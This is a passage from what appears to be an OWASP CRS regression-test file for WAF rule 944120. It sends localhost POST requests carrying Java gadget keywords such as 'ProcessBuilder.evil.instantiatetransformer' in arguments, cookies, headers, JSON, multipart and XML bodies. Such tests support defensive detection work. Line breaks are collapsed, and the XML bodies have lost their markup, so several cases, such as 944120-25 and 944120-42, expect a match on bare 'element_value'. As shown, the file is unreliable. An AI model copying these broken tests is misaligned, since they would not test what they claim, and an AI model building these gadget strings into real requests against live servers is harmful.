Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: 
"test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-12 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-13 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-14 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: 
form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-15 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-16 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-17 + desc: "Content-Type multipart/form-data XML element value 
includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-18 + desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-19 + desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-20 + desc: "Cookie test 
includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-21 + desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-22 + desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-23 + desc: "XML element includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-24 + desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-25 + desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-26 + desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + 
output: + log_contains: "id \"944120\"" + - test_title: 944120-27 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-28 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-29 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-30 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-31 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-32 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + 
{"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-33 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-34 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-35 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-36 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-37 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-38 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-39 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-40 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-41 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-42 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-43 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-44 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-45 + desc: "Content-Type text/plain includes keyword 
ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-46 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-47 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-48 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-49 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-50 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-51 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-52 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-53 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-54 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-55 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-56 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-57 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-58 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 